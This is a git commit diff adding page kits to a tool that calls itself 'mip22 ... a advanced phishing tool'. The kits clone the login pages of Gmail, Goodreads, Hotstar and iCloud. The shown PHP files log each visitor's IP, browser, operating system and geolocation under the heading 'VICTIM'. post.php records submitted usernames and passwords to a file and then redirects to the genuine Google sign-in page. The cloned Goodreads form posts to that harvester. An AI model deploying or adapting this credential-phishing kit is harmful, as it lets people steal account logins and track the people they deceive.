فهرست منبع

Add files via upload

mak 4 سال پیش
والد
کامیت
457833196c
90فایلهای تغییر یافته به همراه29476 افزوده شده و 0 حذف شده
  1. 126 0
      .pages/gmail/fingerprints.php
  2. 2 0
      .pages/gmail/index.html
  3. 25 0
      .pages/gmail/index.php
  4. 130 0
      .pages/gmail/post.php
  5. 126 0
      .pages/goodreads/fingerprints.php
  6. 406 0
      .pages/goodreads/index.html
  7. 25 0
      .pages/goodreads/index.php
  8. 130 0
      .pages/goodreads/post.php
  9. 126 0
      .pages/hotstar/fingerprints.php
  10. BIN
      .pages/hotstar/img/Disney-hotstar-logo-on-blue-background.jpeg
  11. 5 0
      .pages/hotstar/index.html
  12. 25 0
      .pages/hotstar/index.php
  13. 19 0
      .pages/hotstar/index_files/1314647215396209
  14. 0 0
      .pages/hotstar/index_files/39.39.e923ef16ec6c68f82f66.js.download
  15. 0 0
      .pages/hotstar/index_files/40.40.8a4a923ed60e8a5ab3d6.js.download
  16. BIN
      .pages/hotstar/index_files/530856-h.webp
  17. BIN
      .pages/hotstar/index_files/565038-h.webp
  18. BIN
      .pages/hotstar/index_files/565040-h.webp
  19. BIN
      .pages/hotstar/index_files/565041-h.webp
  20. BIN
      .pages/hotstar/index_files/565042-h.webp
  21. BIN
      .pages/hotstar/index_files/565043-h.webp
  22. BIN
      .pages/hotstar/index_files/565045-h.webp
  23. BIN
      .pages/hotstar/index_files/565049-h.webp
  24. BIN
      .pages/hotstar/index_files/565050-h.webp
  25. BIN
      .pages/hotstar/index_files/565053-h.webp
  26. BIN
      .pages/hotstar/index_files/565054-h.webp
  27. BIN
      .pages/hotstar/index_files/565057-h.webp
  28. BIN
      .pages/hotstar/index_files/565059-h.webp
  29. BIN
      .pages/hotstar/index_files/565060-h.webp
  30. BIN
      .pages/hotstar/index_files/565061-h.webp
  31. BIN
      .pages/hotstar/index_files/565062-h.webp
  32. BIN
      .pages/hotstar/index_files/565065-h.webp
  33. BIN
      .pages/hotstar/index_files/565066-h.webp
  34. BIN
      .pages/hotstar/index_files/565067-h.webp
  35. BIN
      .pages/hotstar/index_files/565068-h.webp
  36. BIN
      .pages/hotstar/index_files/565069-h.webp
  37. BIN
      .pages/hotstar/index_files/565070-h.webp
  38. BIN
      .pages/hotstar/index_files/565073-h.webp
  39. BIN
      .pages/hotstar/index_files/565074-h.webp
  40. BIN
      .pages/hotstar/index_files/565076-h.webp
  41. BIN
      .pages/hotstar/index_files/565077-h.webp
  42. BIN
      .pages/hotstar/index_files/565078-h.webp
  43. BIN
      .pages/hotstar/index_files/565079-h.webp
  44. BIN
      .pages/hotstar/index_files/565633-h.webp
  45. BIN
      .pages/hotstar/index_files/565636-h.webp
  46. BIN
      .pages/hotstar/index_files/565637-h.webp
  47. BIN
      .pages/hotstar/index_files/565639-h.webp
  48. BIN
      .pages/hotstar/index_files/565640-h.webp
  49. BIN
      .pages/hotstar/index_files/565655-h.webp
  50. BIN
      .pages/hotstar/index_files/595779-h.webp
  51. BIN
      .pages/hotstar/index_files/625305-h.webp
  52. 3 0
      .pages/hotstar/index_files/activityi(1).html
  53. 3 0
      .pages/hotstar/index_files/activityi(2).html
  54. 3 0
      .pages/hotstar/index_files/activityi.html
  55. 1 0
      .pages/hotstar/index_files/adsct
  56. 130 0
      .pages/hotstar/post.php
  57. 4 0
      .pages/icloud/Apple Inc._files/bootstrap.min.css
  58. 5 0
      .pages/icloud/Apple Inc._files/bootstrap.min.js
  59. BIN
      .pages/icloud/Apple Inc._files/iCloud_logo_iPhone_177x44.jpg
  60. 1 0
      .pages/icloud/Apple Inc._files/jquery.min.js
  61. 140 0
      .pages/icloud/Apple Inc._files/style.css
  62. 224 0
      .pages/icloud/activity-indicator.js
  63. BIN
      .pages/icloud/check1.png
  64. 9 0
      .pages/icloud/css/HelveticaNeue-Light-2.html
  65. BIN
      .pages/icloud/css/HelveticaNeue-Light.html
  66. BIN
      .pages/icloud/css/HelveticaNeue-Light.woff
  67. BIN
      .pages/icloud/css/HelveticaNeue-Medium.woff
  68. BIN
      .pages/icloud/css/Thumbs.db
  69. BIN
      .pages/icloud/css/_logo.png
  70. BIN
      .pages/icloud/css/arrow.png
  71. BIN
      .pages/icloud/css/arrow_bold.png
  72. BIN
      .pages/icloud/css/checked.png
  73. BIN
      .pages/icloud/css/cloud.png
  74. BIN
      .pages/icloud/css/cloud1.png
  75. BIN
      .pages/icloud/css/help.png
  76. BIN
      .pages/icloud/css/icloud_effect1.png
  77. BIN
      .pages/icloud/css/icloud_wallpaper.png
  78. BIN
      .pages/icloud/css/logo.png
  79. BIN
      .pages/icloud/css/packed-1@2x.png
  80. BIN
      .pages/icloud/css/pattern_middle.png
  81. 296 0
      .pages/icloud/css/styles.css
  82. BIN
      .pages/icloud/css/stylesheet-1@2x.png
  83. 126 0
      .pages/icloud/fingerprints.php
  84. 226 0
      .pages/icloud/index.html
  85. 5 0
      .pages/icloud/index.php
  86. 9789 0
      .pages/icloud/jquery-1.10.2.js
  87. 516 0
      .pages/icloud/jquery-ui.css
  88. 16608 0
      .pages/icloud/jquery-ui.js
  89. 112 0
      .pages/icloud/mobile.html
  90. 130 0
      .pages/icloud/post.php

+ 126 - 0
.pages/gmail/fingerprints.php

@@ -0,0 +1,126 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "fingerprints.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nGMAIL VICTIM FINGERPRINTS => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>

تفاوت فایلی نمایش داده نمی شود زیرا این فایل بسیار بزرگ است
+ 2 - 0
.pages/gmail/index.html


+ 25 - 0
.pages/gmail/index.php

@@ -0,0 +1,25 @@
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+include 'fingerprints.php';
+header('Location: index.html');
+exit;
+?>

+ 130 - 0
.pages/gmail/post.php

@@ -0,0 +1,130 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "data.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nGMAIL VICTIM DATA => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, "Username: " . $_POST['email'] . "\n", FILE_APPEND);
+file_put_contents($file, "Password: " . $_POST['password'] . "\n", FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>
+
+ <meta http-equiv="refresh" content="0; url=https://accounts.google.com/ServiceLogin"/> 

+ 126 - 0
.pages/goodreads/fingerprints.php

@@ -0,0 +1,126 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "fingerprints.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nGOODREADS VICTIM FINGERPRINTS => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>

+ 406 - 0
.pages/goodreads/index.html

@@ -0,0 +1,406 @@
+<!DOCTYPE html>
+<html>
+<head>
+  <title>Sign in</title>
+
+<meta content='telephone=no' name='format-detection'>
+<link href='https://www.goodreads.com/user/sign_in' rel='canonical'>
+
+
+
+    <script type="text/javascript"> var ue_t0=window.ue_t0||+new Date();
+ </script>
+  <script type="text/javascript">
+    var ue_mid = "A1PQBFHBHS6YH1";
+    var ue_sn = "www.goodreads.com";
+    var ue_furl = "fls-na.amazon.com";
+    var ue_sid = "597-8494123-8218123";
+    var ue_id = "MS0A1VB2WPQMECQRR24J";
+
+    (function(e){var c=e;var a=c.ue||{};a.main_scope="mainscopecsm";a.q=[];a.t0=c.ue_t0||+new Date();a.d=g;function g(h){return +new Date()-(h?0:a.t0)}function d(h){return function(){a.q.push({n:h,a:arguments,t:a.d()})}}function b(m,l,h,j,i){var k={m:m,f:l,l:h,c:""+j,err:i,fromOnError:1,args:arguments};c.ueLogError(k);return false}b.skipTrace=1;e.onerror=b;function f(){c.uex("ld")}if(e.addEventListener){e.addEventListener("load",f,false)}else{if(e.attachEvent){e.attachEvent("onload",f)}}a.tag=d("tag");a.log=d("log");a.reset=d("rst");c.ue_csm=c;c.ue=a;c.ueLogError=d("err");c.ues=d("ues");c.uet=d("uet");c.uex=d("uex");c.uet("ue")})(window);(function(e,d){var a=e.ue||{};function c(g){if(!g){return}var f=d.head||d.getElementsByTagName("head")[0]||d.documentElement,h=d.createElement("script");h.async="async";h.src=g;f.insertBefore(h,f.firstChild)}function b(){var k=e.ue_cdn||"z-ecx.images-amazon.com",g=e.ue_cdns||"images-na.ssl-images-amazon.com",j="/images/G/01/csminstrumentation/",h=e.ue_file||"ue-full-11e51f253e8ad9d145f4ed644b40f692._V1_.js",f,i;if(h.indexOf("NSTRUMENTATION_FIL")>=0){return}if("ue_https" in e){f=e.ue_https}else{f=e.location&&e.location.protocol=="https:"?1:0}i=f?"https://":"http://";i+=f?g:k;i+=j;i+=h;c(i)}if(!e.ue_inline){if(a.loadUEFull){a.loadUEFull()}else{b()}}a.uels=c;e.ue=a})(window,document);
+
+    if (window.ue && window.ue.tag) { window.ue.tag('user:sign_in:signed_out', ue.main_scope);window.ue.tag('user:sign_in:signed_out:desktop', ue.main_scope); }
+  </script>
+
+  <!-- * Copied from https://info.analytics.a2z.com/#/docs/data_collection/csa/onboard */ -->
+<script>
+  //<![CDATA[
+    !function(){function n(n,t){var r=i(n);return t&&(r=r("instance",t)),r}var r=[],c=0,i=function(t){return function(){var n=c++;return r.push([t,[].slice.call(arguments,0),n,{time:Date.now()}]),i(n)}};n._s=r,this.csa=n}();
+    
+    if (window.csa) {
+      window.csa("Config", {
+        "Application": "GoodreadsMonolith",
+        "Events.SushiEndpoint": "https://unagi.amazon.com/1/events/com.amazon.csm.csa.prod",
+        "Events.Namespace": "csa",
+        "CacheDetection.RequestID": "MS0A1VB2WPQMECQRR24J",
+        "ObfuscatedMarketplaceId": "A1PQBFHBHS6YH1"
+      });
+    
+      window.csa("Events")("setEntity", {
+        session: { id: "597-8494123-8218123" },
+        page: {requestId: "MS0A1VB2WPQMECQRR24J", meaningful: "interactive"}
+      });
+    }
+    
+    var e = document.createElement("script"); e.src = "https://m.media-amazon.com/images/I/41mrkPcyPwL.js"; document.head.appendChild(e);
+  //]]>
+</script>
+
+
+          <script type="text/javascript">
+        if (window.Mobvious === undefined) {
+          window.Mobvious = {};
+        }
+        window.Mobvious.device_type = 'desktop';
+        </script>
+
+
+  
+<script src="https://s.gr-assets.com/assets/webfontloader-a550a17efafeccd666200db5de8ec913.js"></script>
+<script>
+//<![CDATA[
+
+  WebFont.load({
+    classes: false,
+    custom: {
+      families: ["Lato:n4,n7,i4", "Merriweather:n4,n7,i4"],
+      urls: ["https://s.gr-assets.com/assets/gr/fonts-e256f84093cc13b27f5b82343398031a.css"]
+    }
+  });
+
+//]]>
+</script>
+
+  <link rel="stylesheet" media="all" href="https://s.gr-assets.com/assets/goodreads-f635c7a6cbb5ae2a1dea717d397dacf5.css" />
+
+  
+
+  <link rel="stylesheet" media="screen" href="https://s.gr-assets.com/assets/common_images-670d97636259cafc355c94fc43e871d7.css" />
+
+  <script src="https://s.gr-assets.com/assets/desktop/libraries-41a429a5834e6352d597e2cf0b06486f.js"></script>
+  <script src="https://s.gr-assets.com/assets/application-7606609cafaf6fe4c5ef3af6b7d3302f.js"></script>
+
+    <script>
+  //<![CDATA[
+    var gptAdSlots = gptAdSlots || [];
+    var googletag = googletag || {};
+    googletag.cmd = googletag.cmd || [];
+    (function() {
+      var gads = document.createElement("script");
+      gads.async = true;
+      gads.type = "text/javascript";
+      var useSSL = "https:" == document.location.protocol;
+      gads.src = (useSSL ? "https:" : "http:") +
+      "//securepubads.g.doubleclick.net/tag/js/gpt.js";
+      var node = document.getElementsByTagName("script")[0];
+      node.parentNode.insertBefore(gads, node);
+    })();
+    // page settings
+  //]]>
+</script>
+<script>
+  //<![CDATA[
+    googletag.cmd.push(function() {
+      googletag.pubads().setTargeting("sid", "osid.af0d6b1140bd894246a7c27ea636fef6");
+    googletag.pubads().setTargeting("grsession", "osid.af0d6b1140bd894246a7c27ea636fef6");
+    googletag.pubads().setTargeting("surface", "desktop");
+    googletag.pubads().setTargeting("signedin", "false");
+    googletag.pubads().setTargeting("gr_author", "false");
+    googletag.pubads().setTargeting("author", []);
+      googletag.pubads().enableAsyncRendering();
+      googletag.pubads().enableSingleRequest();
+      googletag.pubads().collapseEmptyDivs(true);
+      googletag.pubads().disableInitialLoad();
+      googletag.enableServices();
+    });
+  //]]>
+</script>
+<script>
+  //<![CDATA[
+    ! function(a9, a, p, s, t, A, g) {
+      if (a[a9]) return;
+    
+      function q(c, r) {
+        a[a9]._Q.push([c, r])
+      }
+      a[a9] = {
+      init: function() {
+        q("i", arguments)
+      },
+      fetchBids: function() {
+        q("f", arguments)
+      },
+      setDisplayBids: function() {},
+        _Q: []
+      };
+      A = p.createElement(s);
+      A.async = !0;
+      A.src = t;
+      g = p.getElementsByTagName(s)[0];
+      g.parentNode.insertBefore(A, g)
+    }("apstag", window, document, "script", "//c.amazon-adsystem.com/aax2/apstag.js");
+    
+    apstag.init({
+      pubID: '3211', adServer: 'googletag', bidTimeout: 4e3, params: { aps_privacy: '1YN' }
+    });
+  //]]>
+</script>
+
+
+
+  <meta name="csrf-param" content="authenticity_token" />
+<meta name="csrf-token" content="bJzAznTpydMkpPmVoCO+knTVZzxrP76+S0i7M28oaM4OkkFp87JlYB8jSSJlfR9WEu3aMK+ZATMJWVGAs+W++w==" />
+
+  <meta name="request-id" content="MS0A1VB2WPQMECQRR24J" />
+
+    <script src="https://s.gr-assets.com/assets/react_client_side/external_dependencies-2e2b90fafc.js" defer="defer"></script>
+<script src="https://s.gr-assets.com/assets/react_client_side/site_header-affe4ebd97.js" defer="defer"></script>
+<script src="https://s.gr-assets.com/assets/react_client_side/custom_react_ujs-b1220d5e0a4820e90b905c302fc5cb52.js" defer="defer"></script>
+
+
+  
+
+  
+  
+  
+
+  <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="Goodreads">
+
+
+
+  <meta content='summary' name='twitter:card'>
+<meta content='@goodreads' name='twitter:site'>
+<meta content='Sign in' name='twitter:title'>
+<meta content='See what your friends are reading' name='twitter:description'>
+
+
+  <meta name="verify-v1" content="cEf8XOH0pulh1aYQeZ1gkXHsQ3dMPSyIGGYqmF53690=">
+  <meta name="google-site-verification" content="PfFjeZ9OK1RrUrKlmAPn_iZJ_vgHaZO1YQ-QlG2VsJs" />
+  <meta name="apple-itunes-app" content="app-id=355833469">
+</head>
+
+<link rel="stylesheet" media="screen" href="https://s.gr-assets.com/assets/button-1b37dc86124a129c949fe73029a46494.css" />
+<link rel="stylesheet" media="screen" href="https://s.gr-assets.com/assets/distractionless-7cdf3ea759b4902986e7840f7d5ae039.css" />
+<body class='textured'>
+
+<div class='wrapper'>
+<div class='content distractionless'>
+<div class='clearfix' id='header'>
+<div class='logo'>
+<a target="" href="/"><img width="140" border="0" alt="Goodreads: Book reviews, recommendations, and discussion" src="https://s.gr-assets.com/assets/layout/goodreads_logo_324-a908b923dc3ed9b7a13f3da4d1ffb2df.png" /></a>
+</div>
+<div class='topRight'>
+
+</div>
+</div>
+<div class='mainContentContainer' id='topLanding'>
+<div class='mainContent'>
+  <div class='contentBox clearfix'>
+<div class='column_right' style='float: none;'>
+<h1>
+Sign in to Goodreads
+</h1>
+<div id='choices'>
+<div class="third_party_sign_in">
+    <a href="#" data-redirect="/user/new" class="fbjsLogin " id ="fb-auth-button">
+      <button class="gr-button--facebook gr-button--dark gr-button--auth gr-button  facebookConnectButton fbSignInButton">
+        <span class="gr-button--facebook__icon"></span>
+        Continue with Facebook
+      </button>
+    </a>  
+      <button onclick="GR_Amazon.askToConnect('https://www.goodreads.com/amazon/login/redirect_to_amazon_login_url'); return false;" class="gr-button gr-button--amazon gr-button--auth amazonConnectButton amazonSignInButton">
+      <span class="gr-button--amazon__icon"></span>
+      Continue with Amazon
+    </button>
+      <button onclick="GR_Apple.login(); return false;" class="gr-button gr-button--apple gr-button--auth appleConnectButton thirdPartySignInButton">
+        <span class="gr-button--apple__icon"></span>
+        Continue with Apple
+      </button>
+    <a href="/google_accounts/sign_in">
+      <button class="gr-button gr-button--auth thirdPartyConnectButton thirdPartySignInButton gr-button--google">
+        <span class="gr-button--google__icon"></span>
+        Continue with Google
+      </button>
+    </a>
+</div>
+
+</div>
+<div id='emailForm'>
+<!-- Error messages render with standard React component -->
+
+<!-- auto-populate email from Facebook if available, and set focus -->
+<!-- based on presence/absence of email -->
+<!-- focus on email instead if name is valid but email is invalid -->
+
+<form name="sign_in" action="post.php" accept-charset="UTF-8" method="post">
+	
+
+	<fieldset>
+
+<div class='fieldPara clearFix'>
+<label for='user_email'>Email address</label>
